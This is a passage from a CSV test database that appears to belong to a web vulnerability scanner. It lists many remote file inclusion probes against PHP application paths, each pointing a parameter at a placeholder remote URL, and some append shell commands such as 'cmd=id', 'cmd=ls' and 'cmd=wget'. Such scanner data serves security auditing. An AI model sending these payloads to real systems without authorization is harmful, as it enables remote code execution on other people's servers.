Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004540\",\"5292\",\"c\",\"/config.php?rel_path=@RFIURL? \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004541\",\"5292\",\"c\",\"/config.php?returnpath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004542\",\"5292\",\"c\",\"/config.php?sql_language=@RFIURL?&cmd=0wn3d By Dr\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004543\",\"5292\",\"c\",\"/config.php?xcart_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004544\",\"5292\",\"c\",\"/config.php?xcart_dir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004545\",\"5292\",\"c\",\"/config/config_admin.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004546\",\"5292\",\"c\",\"/config/config_main.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004547\",\"5292\",\"c\",\"/config/config_member.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004548\",\"5292\",\"c\",\"/config/dbutil.bck.php?confdir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004549\",\"5292\",\"c\",\"/config/mysql_config.php?INC=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004550\",\"5292\",\"c\",\"/config/sender.php?ROOT_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004551\",\"5292\",\"c\",\"/configuration.php?absolute_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004552\",\"5292\",\"c\",\"/confirmUnsubscription.php?output=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004553\",\"5292\",\"c\",\"/connect.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004554\",\"5292\",\"c\",\"/connexion.php?DOCUMENT_ROOT=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004555\",\"5292\",\"c\",\"/contact.php?blog_theme=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004556\",\"5292\",\"c\",\"/contacts.php?cal_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004557\",\"5292\",\"c\",\"/contenido/external/frontend/news.php?cfg[path][includes]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004558\",\"5292\",\"c\",\"/content.php?content=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004559\",\"5292\",\"c\",\"/content/admin.php?pwfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004560\",\"5292\",\"c\",\"/content/content.php?fileloc=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004561\",\"5292\",\"c\",\"/content/delete.php?pwfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004562\",\"5292\",\"c\",\"/content/modify.php?pwfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004563\",\"5292\",\"c\",\"/content/modify_go.php?pwfile=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004564\",\"5292\",\"c\",\"/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004565\",\"5292\",\"c\",\"/contrib/mx_glance_sdesc.php?mx_root_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004566\",\"5292\",\"c\",\"/contrib/phpBB2/modules.php?phpbb_root_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004567\",\"5292\",\"c\",\"/controllers/MySQLController.php?baseDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004568\",\"5292\",\"c\",\"/controllers/SQLController.php?baseDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004569\",\"5292\",\"c\",\"/controllers/SetupController.php?baseDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004570\",\"5292\",\"c\",\"/controllers/VideoController.php?baseDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004571\",\"5292\",\"c\",\"/controllers/ViewController.php?baseDir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004572\",\"5292\",\"c\",\"/convert-date.php?cal_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004573\",\"5292\",\"c\",\"/convert/mvcw.php?step=1&vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004574\",\"5292\",\"c\",\"/convert/mvcw.php?vwar_root=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004575\",\"5292\",\"c\",\"/core/admin/admin.php?p=admin&absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004576\",\"5292\",\"c\",\"/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004577\",\"5292\",\"c\",\"/core/admin/categories_add.php?absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004578\",\"5292\",\"c\",\"/core/admin/categories_remove.php?absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004579\",\"5292\",\"c\",\"/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004580\",\"5292\",\"c\",\"/core/admin/editdel.php?p=admin&absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004581\",\"5292\",\"c\",\"/core/admin/ftpfeature.php?p=admin&absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004582\",\"5292\",\"c\",\"/core/admin/login.php?absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004583\",\"5292\",\"c\",\"/core/admin/pgRSSnews.php?absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004584\",\"5292\",\"c\",\"/core/admin/showcat.php?absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004585\",\"5292\",\"c\",\"/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004586\",\"5292\",\"c\",\"/core/archive_cat.php?absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004587\",\"5292\",\"c\",\"/core/archive_nocat.php?absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004588\",\"5292\",\"c\",\"/core/aural.php?site_absolute_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004589\",\"5292\",\"c\",\"/core/aural.php?site_absolute_path=@RFIURL?&cmd=dir\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004590\",\"5292\",\"c\",\"/core/editor.php?editor_insert_bottom=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004591\",\"5292\",\"c\",\"/core/includes.php?CMS_ROOT=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004592\",\"5292\",\"c\",\"/core/recent_list.php?absoluteurl@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004593\",\"5292\",\"c\",\"/corpo.php?pagina=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004594\",\"5292\",\"c\",\"/cp2.php?securelib=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004595\",\"5292\",\"c\",\"/cp2.php?securelib=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004596\",\"5292\",\"c\",\"/cpe/index.php?repertoire_config=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004597\",\"5292\",\"c\",\"/crea.php?plancia=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004598\",\"5292\",\"c\",\"/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004599\",\"5292\",\"c\",\"/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004600\",\"5292\",\"c\",\"/creat_news_all.php?language=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004601\",\"5292\",\"c\",\"/create_file.php?target=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004602\",\"5292\",\"c\",\"/cron.php?ROOT_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004603\",\"5292\",\"c\",\"/cron.php?include_path=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004604\",\"5292\",\"c\",\"/crontab/run_billing.php?config[include_dir]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004605\",\"5292\",\"c\",\"/crontab/run_billing.php?config[include_dir]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004606\",\"5292\",\"c\",\"/cross.php?url=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004607\",\"5292\",\"c\",\"/cross.php?url=@RFIURL \",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004608\",\"5292\",\"c\",\"/custom_vars.php?sys[path_addon]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004609\",\"5292\",\"c\",\"/customer/product.php?xcart_dir=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004610\",\"5292\",\"c\",\"/cwb/comanda.php?INCLUDE_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004611\",\"5292\",\"c\",\"/datei.php?config[root_ordner]=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004612\",\"5292\",\"c\",\"/db/PollDB.php?CONFIG_DATAREADERWRITER=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004613\",\"5292\",\"c\",\"/db/mysql/db.inc.php?SPL_CFG[dirroot]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004614\",\"5292\",\"c\",\"/dbcommon/include.php?_APP_RELATIVE_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004615\",\"5292\",\"c\",\"/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004616\",\"5292\",\"c\",\"/debugger.php?config_atkroot=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004617\",\"5292\",\"c\",\"/decoder/gallery.php?ccms_library_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004618\",\"5292\",\"c\",\"/decoder/markdown.php?ccms_library_path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004619\",\"5292\",\"c\",\"/defaults_setup.php?ROOT_PATH=@RFIURL?cmd=ls\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004620\",\"5292\",\"c\",\"/defines.php?WEBCHATPATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004621\",\"5292\",\"c\",\"/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=@RFIURL&\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004622\",\"5292\",\"c\",\"/depouilg.php3?NomVote=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004623\",\"5292\",\"c\",\"/development.php?root_prefix=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004624\",\"5292\",\"c\",\"/development.php?root_prefix=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004625\",\"5292\",\"c\",\"/dfcode.php?DFORUM_PATH=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004626\",\"5292\",\"c\",\"/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004627\",\"5292\",\"c\",\"/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004628\",\"5292\",\"c\",\"/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004629\",\"5292\",\"c\",\"/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004630\",\"5292\",\"c\",\"/dialog.php?CONFIG[MWCHAT_Libs]=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004631\",\"5292\",\"c\",\"/dialogs/a.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004632\",\"5292\",\"c\",\"/dialogs/collorpicker.php?spaw_dir=@RFIURL&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004633\",\"5292\",\"c\",\"/dialogs/img.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004634\",\"5292\",\"c\",\"/dialogs/img_library.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004635\",\"5292\",\"c\",\"/dialogs/table.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004636\",\"5292\",\"c\",\"/dialogs/td.php?spaw_dir=@RFIURL?&cmd=id\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004637\",\"5292\",\"c\",\"/digitaleye_Path/module.php?menu=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004638\",\"5292\",\"c\",\"/dir/prepend.php?_PX_config[manager_path]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004639\",\"5292\",\"c\",\"/dir_thatware/config.php?root_path=@RFIURL'\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004640\",\"5292\",\"c\",\"/direct.php?rf=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004641\",\"5292\",\"c\",\"/direction/index.php?repertoire_config=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004642\",\"5292\",\"c\",\"/directory/index.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004643\",\"5292\",\"c\",\"/display.php?pag=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004644\",\"5292\",\"c\",\"/display.php?path=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004645\",\"5292\",\"c\",\"/displayCategory.php?basepath=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004646\",\"5292\",\"c\",\"/dix.php3?url_phpartenaire=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004647\",\"5292\",\"c\",\"/dm-albums/template/album.php?SECURITY_FILE=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004648\",\"5292\",\"c\",\"/doc/admin/index.php?ptinclude=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004649\",\"5292\",\"c\",\"/doceboCore/lib/lib.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004650\",\"5292\",\"c\",\"/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004651\",\"5292\",\"c\",\"/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004652\",\"5292\",\"c\",\"/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004653\",\"5292\",\"c\",\"/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004654\",\"5292\",\"c\",\"/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=@RFIURL\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004655\",\"5292\",\"c\",\"/docs/front-end-demo/cart2.php?workdir=@RFIURL?\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list (https://gist.github.com/mubix/5d269c686584875015a2)\",\"\",\"\"\n\"004656\",\"5292\",\"c\",\"/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=@RFIURL?&cmd=wget%20XXpathXX\",\"GET\",\"PHP Version\",\"\",\"\",\"\",\"\",\"RFI from RSnake's list 